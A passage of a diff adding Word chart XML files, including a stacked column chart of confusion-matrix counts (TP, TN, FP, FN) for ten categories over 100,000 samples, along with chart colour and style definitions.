+    <c:dispBlanksAs val="gap"/>
+    <c:showDLblsOverMax val="0"/>
+  </c:chart>
+  <c:spPr>
+    <a:solidFill>
+      <a:schemeClr val="lt1"/>
+    </a:solidFill>
+    <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+      <a:solidFill>
+        <a:schemeClr val="dk1">
+          <a:lumMod val="15000"/>
+          <a:lumOff val="85000"/>
+        </a:schemeClr>
+      </a:solidFill>
+      <a:round/>
+    </a:ln>
+    <a:effectLst/>
+  </c:spPr>
+  <c:txPr>
+    <a:bodyPr/>
+    <a:lstStyle/>
+    <a:p>
+      <a:pPr>
+        <a:defRPr/>
+      </a:pPr>
+      <a:endParaRPr lang="hu-HU"/>
+    </a:p>
+  </c:txPr>
+  <c:externalData r:id="rId4">
+    <c:autoUpdate val="0"/>
+  </c:externalData>
+</c:chartSpace>
+</file>
+
+<file path=word/charts/chart2.xml><?xml version="1.0" encoding="utf-8"?>
+<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:c16r2="http://schemas.microsoft.com/office/drawing/2015/06/chart">
+  <c:date1904 val="0"/>
+  <c:lang val="hu-HU"/>
+  <c:roundedCorners val="0"/>
+  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
+    <mc:Choice xmlns:c14="http://schemas.microsoft.com/office/drawing/2007/8/2/chart" Requires="c14">
+      <c14:style val="102"/>
+    </mc:Choice>
+    <mc:Fallback>
+      <c:style val="2"/>
+    </mc:Fallback>
+  </mc:AlternateContent>
+  <c:clrMapOvr bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
+  <c:chart>
+    <c:title>
+      <c:tx>
+        <c:rich>
+          <a:bodyPr rot="0" spcFirstLastPara="1" vertOverflow="ellipsis" vert="horz" wrap="square" anchor="ctr" anchorCtr="1"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr>
+              <a:defRPr sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1">
+                    <a:lumMod val="50000"/>
+                    <a:lumOff val="50000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mj-lt"/>
+                <a:ea typeface="+mj-ea"/>
+                <a:cs typeface="+mj-cs"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="hu-HU"/>
+              <a:t>Confusion matrix for 100000 samples</a:t>
+            </a:r>
+          </a:p>
+        </c:rich>
+      </c:tx>
+      <c:overlay val="0"/>
+      <c:spPr>
+        <a:noFill/>
+        <a:ln>
+          <a:noFill/>
+        </a:ln>
+        <a:effectLst/>
+      </c:spPr>
+      <c:txPr>
+        <a:bodyPr rot="0" spcFirstLastPara="1" vertOverflow="ellipsis" vert="horz" wrap="square" anchor="ctr" anchorCtr="1"/>
+        <a:lstStyle/>
+        <a:p>
+          <a:pPr>
+            <a:defRPr sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0">
+              <a:solidFill>
+                <a:schemeClr val="dk1">
+                  <a:lumMod val="50000"/>
+                  <a:lumOff val="50000"/>
+                </a:schemeClr>
+              </a:solidFill>
+              <a:latin typeface="+mj-lt"/>
+              <a:ea typeface="+mj-ea"/>
+              <a:cs typeface="+mj-cs"/>
+            </a:defRPr>
+          </a:pPr>
+          <a:endParaRPr lang="hu-HU"/>
+        </a:p>
+      </c:txPr>
+    </c:title>
+    <c:autoTitleDeleted val="0"/>
+    <c:plotArea>
+      <c:layout/>
+      <c:barChart>
+        <c:barDir val="col"/>
+        <c:grouping val="stacked"/>
+        <c:varyColors val="0"/>
+        <c:ser>
+          <c:idx val="0"/>
+          <c:order val="0"/>
+          <c:tx>
+            <c:strRef>
+              <c:f>Munka1!$G$2</c:f>
+              <c:strCache>
+                <c:ptCount val="1"/>
+                <c:pt idx="0">
+                  <c:v>TP</c:v>
+                </c:pt>
+              </c:strCache>
+            </c:strRef>
+          </c:tx>
+          <c:spPr>
+            <a:solidFill>
+              <a:schemeClr val="accent1">
+                <a:lumMod val="75000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+            <a:effectLst/>
+          </c:spPr>
+          <c:invertIfNegative val="0"/>
+          <c:val>
+            <c:numRef>
+              <c:f>Munka1!$G$3:$G$12</c:f>
+              <c:numCache>
+                <c:formatCode>General</c:formatCode>
+                <c:ptCount val="10"/>
+                <c:pt idx="0">
+                  <c:v>42532</c:v>
+                </c:pt>
+                <c:pt idx="1">
+                  <c:v>47370</c:v>
+                </c:pt>
+                <c:pt idx="2">
+                  <c:v>42548</c:v>
+                </c:pt>
+                <c:pt idx="3">
+                  <c:v>41702</c:v>
+                </c:pt>
+                <c:pt idx="4">
+                  <c:v>45274</c:v>
+                </c:pt>
+                <c:pt idx="5">
+                  <c:v>42446</c:v>
+                </c:pt>
+                <c:pt idx="6">
+                  <c:v>42668</c:v>
+                </c:pt>
+                <c:pt idx="7">
+                  <c:v>48750</c:v>
+                </c:pt>
+                <c:pt idx="8">
+                  <c:v>40254</c:v>
+                </c:pt>
+                <c:pt idx="9">
+                  <c:v>49164</c:v>
+                </c:pt>
+              </c:numCache>
+            </c:numRef>
+          </c:val>
+          <c:extLst>
+            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
+              <c16:uniqueId val="{00000000-09DB-4368-A274-4C1DF74EEA36}"/>
+            </c:ext>
+          </c:extLst>
+        </c:ser>
+        <c:ser>
+          <c:idx val="1"/>
+          <c:order val="1"/>
+          <c:tx>
+            <c:strRef>
+              <c:f>Munka1!$H$2</c:f>
+              <c:strCache>
+                <c:ptCount val="1"/>
+                <c:pt idx="0">
+                  <c:v>TN</c:v>
+                </c:pt>
+              </c:strCache>
+            </c:strRef>
+          </c:tx>
+          <c:spPr>
+            <a:solidFill>
+              <a:schemeClr val="accent1">
+                <a:lumMod val="40000"/>
+                <a:lumOff val="60000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+            <a:effectLst/>
+          </c:spPr>
+          <c:invertIfNegative val="0"/>
+          <c:val>
+            <c:numRef>
+              <c:f>Munka1!$H$3:$H$12</c:f>
+              <c:numCache>
+                <c:formatCode>General</c:formatCode>
+                <c:ptCount val="10"/>
+                <c:pt idx="0">
+                  <c:v>7397</c:v>
+                </c:pt>
+                <c:pt idx="1">
+                  <c:v>2581</c:v>
+                </c:pt>
+                <c:pt idx="2">
+                  <c:v>7377</c:v>
+                </c:pt>
+                <c:pt idx="3">
+                  <c:v>8261</c:v>
+                </c:pt>
+                <c:pt idx="4">
+                  <c:v>4692</c:v>
+                </c:pt>
+                <c:pt idx="5">
+                  <c:v>7539</c:v>
+                </c:pt>
+                <c:pt idx="6">
+                  <c:v>7333</c:v>
+                </c:pt>
+                <c:pt idx="7">
+                  <c:v>1197</c:v>
+                </c:pt>
+                <c:pt idx="8">
+                  <c:v>8682</c:v>
+                </c:pt>
+                <c:pt idx="9">
+                  <c:v>761</c:v>
+                </c:pt>
+              </c:numCache>
+            </c:numRef>
+          </c:val>
+          <c:extLst>
+            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
+              <c16:uniqueId val="{00000001-09DB-4368-A274-4C1DF74EEA36}"/>
+            </c:ext>
+          </c:extLst>
+        </c:ser>
+        <c:ser>
+          <c:idx val="2"/>
+          <c:order val="2"/>
+          <c:tx>
+            <c:strRef>
+              <c:f>Munka1!$I$2</c:f>
+              <c:strCache>
+                <c:ptCount val="1"/>
+                <c:pt idx="0">
+                  <c:v>FP</c:v>
+                </c:pt>
+              </c:strCache>
+            </c:strRef>
+          </c:tx>
+          <c:spPr>
+            <a:solidFill>
+              <a:schemeClr val="accent1">
+                <a:lumMod val="20000"/>
+                <a:lumOff val="80000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+            <a:effectLst/>
+          </c:spPr>
+          <c:invertIfNegative val="0"/>
+          <c:val>
+            <c:numRef>
+              <c:f>Munka1!$I$3:$I$12</c:f>
+              <c:numCache>
+                <c:formatCode>General</c:formatCode>
+                <c:ptCount val="10"/>
+                <c:pt idx="0">
+                  <c:v>1710</c:v>
+                </c:pt>
+                <c:pt idx="1">
+                  <c:v>16777</c:v>
+                </c:pt>
+                <c:pt idx="2">
+                  <c:v>6492</c:v>
+                </c:pt>
+                <c:pt idx="3">
+                  <c:v>7485</c:v>
+                </c:pt>
+                <c:pt idx="4">
+                  <c:v>8893</c:v>
+                </c:pt>
+                <c:pt idx="5">
+                  <c:v>8769</c:v>
+                </c:pt>
+                <c:pt idx="6">
+                  <c:v>3488</c:v>
+                </c:pt>
+                <c:pt idx="7">
+                  <c:v>3133</c:v>
+                </c:pt>
+                <c:pt idx="8">
+                  <c:v>4501</c:v>
+                </c:pt>
+                <c:pt idx="9">
+                  <c:v>3376</c:v>
+                </c:pt>
+              </c:numCache>
+            </c:numRef>
+          </c:val>
+          <c:extLst>
+            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
+              <c16:uniqueId val="{00000002-09DB-4368-A274-4C1DF74EEA36}"/>
+            </c:ext>
+          </c:extLst>
+        </c:ser>
+        <c:ser>
+          <c:idx val="3"/>
+          <c:order val="3"/>
+          <c:tx>
+            <c:strRef>
+              <c:f>Munka1!$J$2</c:f>
+              <c:strCache>
+                <c:ptCount val="1"/>
+                <c:pt idx="0">
+                  <c:v>FN</c:v>
+                </c:pt>
+              </c:strCache>
+            </c:strRef>
+          </c:tx>
+          <c:spPr>
+            <a:solidFill>
+              <a:schemeClr val="accent1">
+                <a:lumMod val="60000"/>
+                <a:lumOff val="40000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+            <a:effectLst/>
+          </c:spPr>
+          <c:invertIfNegative val="0"/>
+          <c:val>
+            <c:numRef>
+              <c:f>Munka1!$J$3:$J$12</c:f>
+              <c:numCache>
+                <c:formatCode>General</c:formatCode>
+                <c:ptCount val="10"/>
+                <c:pt idx="0">
+                  <c:v>48261</c:v>
+                </c:pt>
+                <c:pt idx="1">
+                  <c:v>33172</c:v>
+                </c:pt>
+                <c:pt idx="2">
+                  <c:v>43483</c:v>
+                </c:pt>
+                <c:pt idx="3">
+                  <c:v>42425</c:v>
+                </c:pt>
+                <c:pt idx="4">
+                  <c:v>41041</c:v>
+                </c:pt>
+                <c:pt idx="5">
+                  <c:v>41146</c:v>
+                </c:pt>
+                <c:pt idx="6">
+                  <c:v>46411</c:v>
+                </c:pt>
+                <c:pt idx="7">
+                  <c:v>46820</c:v>
+                </c:pt>
+                <c:pt idx="8">
+                  <c:v>45463</c:v>
+                </c:pt>
+                <c:pt idx="9">
+                  <c:v>46599</c:v>
+                </c:pt>
+              </c:numCache>
+            </c:numRef>
+          </c:val>
+          <c:extLst>
+            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
+              <c16:uniqueId val="{00000003-09DB-4368-A274-4C1DF74EEA36}"/>
+            </c:ext>
+          </c:extLst>
+        </c:ser>
+        <c:dLbls>
+          <c:showLegendKey val="0"/>
+          <c:showVal val="0"/>
+          <c:showCatName val="0"/>
+          <c:showSerName val="0"/>
+          <c:showPercent val="0"/>
+          <c:showBubbleSize val="0"/>
+        </c:dLbls>
+        <c:gapWidth val="150"/>
+        <c:overlap val="100"/>
+        <c:axId val="1961956160"/>
+        <c:axId val="1961953664"/>
+      </c:barChart>
+      <c:catAx>
+        <c:axId val="1961956160"/>
+        <c:scaling>
+          <c:orientation val="minMax"/>
+        </c:scaling>
+        <c:delete val="0"/>
+        <c:axPos val="b"/>
+        <c:majorGridlines>
+          <c:spPr>
+            <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+              <a:solidFill>
+                <a:schemeClr val="dk1">
+                  <a:lumMod val="15000"/>
+                  <a:lumOff val="85000"/>
+                </a:schemeClr>
+              </a:solidFill>
+              <a:round/>
+            </a:ln>
+            <a:effectLst/>
+          </c:spPr>
+        </c:majorGridlines>
+        <c:numFmt formatCode="General" sourceLinked="1"/>
+        <c:majorTickMark val="none"/>
+        <c:minorTickMark val="none"/>
+        <c:tickLblPos val="nextTo"/>
+        <c:spPr>
+          <a:noFill/>
+          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+            <a:solidFill>
+              <a:schemeClr val="dk1">
+                <a:lumMod val="15000"/>
+                <a:lumOff val="85000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:round/>
+          </a:ln>
+          <a:effectLst/>
+        </c:spPr>
+        <c:txPr>
+          <a:bodyPr rot="-60000000" spcFirstLastPara="1" vertOverflow="ellipsis" vert="horz" wrap="square" anchor="ctr" anchorCtr="1"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr>
+              <a:defRPr sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1">
+                    <a:lumMod val="65000"/>
+                    <a:lumOff val="35000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:endParaRPr lang="hu-HU"/>
+          </a:p>
+        </c:txPr>
+        <c:crossAx val="1961953664"/>
+        <c:crosses val="autoZero"/>
+        <c:auto val="1"/>
+        <c:lblAlgn val="ctr"/>
+        <c:lblOffset val="100"/>
+        <c:noMultiLvlLbl val="0"/>
+      </c:catAx>
+      <c:valAx>
+        <c:axId val="1961953664"/>
+        <c:scaling>
+          <c:orientation val="minMax"/>
+          <c:max val="100000"/>
+        </c:scaling>
+        <c:delete val="0"/>
+        <c:axPos val="l"/>
+        <c:majorGridlines>
+          <c:spPr>
+            <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+              <a:solidFill>
+                <a:schemeClr val="dk1">
+                  <a:lumMod val="15000"/>
+                  <a:lumOff val="85000"/>
+                </a:schemeClr>
+              </a:solidFill>
+              <a:round/>
+            </a:ln>
+            <a:effectLst/>
+          </c:spPr>
+        </c:majorGridlines>
+        <c:numFmt formatCode="General" sourceLinked="1"/>
+        <c:majorTickMark val="none"/>
+        <c:minorTickMark val="none"/>
+        <c:tickLblPos val="nextTo"/>
+        <c:spPr>
+          <a:noFill/>
+          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+            <a:solidFill>
+              <a:schemeClr val="dk1">
+                <a:lumMod val="15000"/>
+                <a:lumOff val="85000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:round/>
+          </a:ln>
+          <a:effectLst/>
+        </c:spPr>
+        <c:txPr>
+          <a:bodyPr rot="-60000000" spcFirstLastPara="1" vertOverflow="ellipsis" vert="horz" wrap="square" anchor="ctr" anchorCtr="1"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr>
+              <a:defRPr sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1">
+                    <a:lumMod val="65000"/>
+                    <a:lumOff val="35000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:endParaRPr lang="hu-HU"/>
+          </a:p>
+        </c:txPr>
+        <c:crossAx val="1961956160"/>
+        <c:crosses val="autoZero"/>
+        <c:crossBetween val="between"/>
+      </c:valAx>
+      <c:spPr>
+        <a:pattFill prst="ltDnDiag">
+          <a:fgClr>
+            <a:schemeClr val="dk1">
+              <a:lumMod val="15000"/>
+              <a:lumOff val="85000"/>
+            </a:schemeClr>
+          </a:fgClr>
+          <a:bgClr>
+            <a:schemeClr val="lt1"/>
+          </a:bgClr>
+        </a:pattFill>
+        <a:ln>
+          <a:noFill/>
+        </a:ln>
+        <a:effectLst/>
+      </c:spPr>
+    </c:plotArea>
+    <c:legend>
+      <c:legendPos val="b"/>
+      <c:overlay val="0"/>
+      <c:spPr>
+        <a:noFill/>
+        <a:ln>
+          <a:noFill/>
+        </a:ln>
+        <a:effectLst/>
+      </c:spPr>
+      <c:txPr>
+        <a:bodyPr rot="0" spcFirstLastPara="1" vertOverflow="ellipsis" vert="horz" wrap="square" anchor="ctr" anchorCtr="1"/>
+        <a:lstStyle/>
+        <a:p>
+          <a:pPr>
+            <a:defRPr sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
+              <a:solidFill>
+                <a:schemeClr val="dk1">
+                  <a:lumMod val="65000"/>
+                  <a:lumOff val="35000"/>
+                </a:schemeClr>
+              </a:solidFill>
+              <a:latin typeface="+mn-lt"/>
+              <a:ea typeface="+mn-ea"/>
+              <a:cs typeface="+mn-cs"/>
+            </a:defRPr>
+          </a:pPr>
+          <a:endParaRPr lang="hu-HU"/>
+        </a:p>
+      </c:txPr>
+    </c:legend>
+    <c:plotVisOnly val="1"/>
+    <c:dispBlanksAs val="gap"/>
+    <c:showDLblsOverMax val="0"/>
+  </c:chart>
+  <c:spPr>
+    <a:solidFill>
+      <a:schemeClr val="lt1"/>
+    </a:solidFill>
+    <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+      <a:solidFill>
+        <a:schemeClr val="dk1">
+          <a:lumMod val="15000"/>
+          <a:lumOff val="85000"/>
+        </a:schemeClr>
+      </a:solidFill>
+      <a:round/>
+    </a:ln>
+    <a:effectLst/>
+  </c:spPr>
+  <c:txPr>
+    <a:bodyPr/>
+    <a:lstStyle/>
+    <a:p>
+      <a:pPr>
+        <a:defRPr/>
+      </a:pPr>
+      <a:endParaRPr lang="hu-HU"/>
+    </a:p>
+  </c:txPr>
+  <c:externalData r:id="rId4">
+    <c:autoUpdate val="0"/>
+  </c:externalData>
+</c:chartSpace>
+</file>
+
+<file path=word/charts/colors1.xml><?xml version="1.0" encoding="utf-8"?>
+<cs:colorStyle xmlns:cs="http://schemas.microsoft.com/office/drawing/2012/chartStyle" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" meth="withinLinear" id="14">
+  <a:schemeClr val="accent1"/>
+</cs:colorStyle>
+</file>
+
+<file path=word/charts/colors2.xml><?xml version="1.0" encoding="utf-8"?>
+<cs:colorStyle xmlns:cs="http://schemas.microsoft.com/office/drawing/2012/chartStyle" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" meth="cycle" id="10">
+  <a:schemeClr val="accent1"/>
+  <a:schemeClr val="accent2"/>
+  <a:schemeClr val="accent3"/>
+  <a:schemeClr val="accent4"/>
+  <a:schemeClr val="accent5"/>
+  <a:schemeClr val="accent6"/>
+  <cs:variation/>
+  <cs:variation>
+    <a:lumMod val="60000"/>
+  </cs:variation>
+  <cs:variation>
+    <a:lumMod val="80000"/>
+    <a:lumOff val="20000"/>
+  </cs:variation>
+  <cs:variation>
+    <a:lumMod val="80000"/>
+  </cs:variation>
+  <cs:variation>
+    <a:lumMod val="60000"/>
+    <a:lumOff val="40000"/>
+  </cs:variation>
+  <cs:variation>
+    <a:lumMod val="50000"/>
+  </cs:variation>
+  <cs:variation>
+    <a:lumMod val="70000"/>
+    <a:lumOff val="30000"/>
+  </cs:variation>
+  <cs:variation>
+    <a:lumMod val="70000"/>
+  </cs:variation>
+  <cs:variation>
+    <a:lumMod val="50000"/>
+    <a:lumOff val="50000"/>
+  </cs:variation>
+</cs:colorStyle>
+</file>
+
+<file path=word/charts/style1.xml><?xml version="1.0" encoding="utf-8"?>
+<cs:chartStyle xmlns:cs="http://schemas.microsoft.com/office/drawing/2012/chartStyle" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" id="303">
+  <cs:axisTitle>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1">
+        <a:lumMod val="65000"/>
+        <a:lumOff val="35000"/>
+      </a:schemeClr>
+    </cs:fontRef>
+    <cs:defRPr sz="900" b="1" kern="1200"/>
+  </cs:axisTitle>
+  <cs:categoryAxis>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1">
+        <a:lumMod val="65000"/>
+        <a:lumOff val="35000"/>
+      </a:schemeClr>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="15000"/>
+            <a:lumOff val="85000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+    <cs:defRPr sz="900" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0"/>
+  </cs:categoryAxis>
+  <cs:chartArea>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:solidFill>
+        <a:schemeClr val="lt1"/>
+      </a:solidFill>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="15000"/>
+            <a:lumOff val="85000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+    <cs:defRPr sz="900" kern="1200"/>
+  </cs:chartArea>
+  <cs:dataLabel>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1">
+        <a:lumMod val="75000"/>
+        <a:lumOff val="25000"/>
+      </a:schemeClr>
+    </cs:fontRef>
+    <cs:defRPr sz="900" kern="1200"/>
+  </cs:dataLabel>
+  <cs:dataLabelCallout>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1">
+        <a:lumMod val="65000"/>
+        <a:lumOff val="35000"/>
+      </a:schemeClr>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:solidFill>
+        <a:schemeClr val="lt1"/>
+      </a:solidFill>
+      <a:ln>
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="25000"/>
+            <a:lumOff val="75000"/>
+          </a:schemeClr>
+        </a:solidFill>
+      </a:ln>
+    </cs:spPr>
+    <cs:defRPr sz="900" kern="1200"/>
+    <cs:bodyPr rot="0" spcFirstLastPara="1" vertOverflow="clip" horzOverflow="clip" vert="horz" wrap="square" lIns="36576" tIns="18288" rIns="36576" bIns="18288" anchor="ctr" anchorCtr="1">
+      <a:spAutoFit/>
+    </cs:bodyPr>
+  </cs:dataLabelCallout>
+  <cs:dataPoint>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0">
+      <cs:styleClr val="auto"/>
+    </cs:fillRef>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:solidFill>
+        <a:schemeClr val="phClr"/>
+      </a:solidFill>
+    </cs:spPr>
+  </cs:dataPoint>
+  <cs:dataPoint3D>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0">
+      <cs:styleClr val="auto"/>
+    </cs:fillRef>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:solidFill>
+        <a:schemeClr val="phClr"/>
+      </a:solidFill>
+    </cs:spPr>
+  </cs:dataPoint3D>
+  <cs:dataPointLine>
+    <cs:lnRef idx="0">
+      <cs:styleClr val="auto"/>
+    </cs:lnRef>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="22225" cap="rnd">
+        <a:solidFill>
+          <a:schemeClr val="phClr"/>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:dataPointLine>
+  <cs:dataPointMarker>
+    <cs:lnRef idx="0">
+      <cs:styleClr val="auto"/>
+    </cs:lnRef>
+    <cs:fillRef idx="0">
+      <cs:styleClr val="auto"/>
+    </cs:fillRef>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:solidFill>
+        <a:schemeClr val="lt1"/>
+      </a:solidFill>
+      <a:ln w="15875">
+        <a:solidFill>
+          <a:schemeClr val="phClr"/>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:dataPointMarker>
+  <cs:dataPointMarkerLayout symbol="circle" size="6"/>
+  <cs:dataPointWireframe>
+    <cs:lnRef idx="0">
+      <cs:styleClr val="auto"/>
+    </cs:lnRef>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="rnd">
+        <a:solidFill>
+          <a:schemeClr val="phClr"/>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:dataPointWireframe>
+  <cs:dataTable>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1">
+        <a:lumMod val="65000"/>
+        <a:lumOff val="35000"/>
+      </a:schemeClr>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="15000"/>
+            <a:lumOff val="85000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+    <cs:defRPr sz="800" kern="1200"/>
+  </cs:dataTable>
+  <cs:downBar>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:solidFill>
+        <a:schemeClr val="dk1">
+          <a:lumMod val="75000"/>
+          <a:lumOff val="25000"/>
+        </a:schemeClr>
+      </a:solidFill>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="50000"/>
+            <a:lumOff val="50000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:downBar>
+  <cs:dropLine>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="35000"/>
+            <a:lumOff val="65000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:dropLine>
+  <cs:errorBar>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="50000"/>
+            <a:lumOff val="50000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:errorBar>
+  <cs:floor>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:pattFill prst="ltDnDiag">
+        <a:fgClr>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="15000"/>
+            <a:lumOff val="85000"/>
+          </a:schemeClr>
+        </a:fgClr>
+        <a:bgClr>
+          <a:schemeClr val="lt1"/>
+        </a:bgClr>
+      </a:pattFill>
+    </cs:spPr>
+  </cs:floor>
+  <cs:gridlineMajor>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
